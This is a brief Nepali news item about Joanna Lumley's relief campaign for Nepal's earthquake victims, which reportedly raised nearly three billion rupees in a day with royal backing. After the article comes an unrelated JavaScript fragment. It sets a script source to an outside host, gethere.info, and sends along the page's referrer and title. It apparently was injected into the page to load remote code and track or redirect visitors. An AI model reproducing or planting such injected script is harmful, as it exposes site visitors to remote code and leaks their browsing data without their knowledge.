नेपालका भूकम्प पीडितहरुको सहयोगका लागि अभिनेत्री जोअना लुम्लेले राहत संकलन अभियान सुरु गर्नुभएको छ । लुम्लेले सञ्चालन गरेको सहयोग अभियानबाट एकै दिनमा झन्डै तीन अर्ब रुपैयाँ संकलन भएको छ । अभिनेत्री लुम्लेले सञ्चालन गरेको अभियानलाई बेलायती महारानी तथा युवराज चाल्र्सले पनि समर्थन गर्नुभएको छ ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;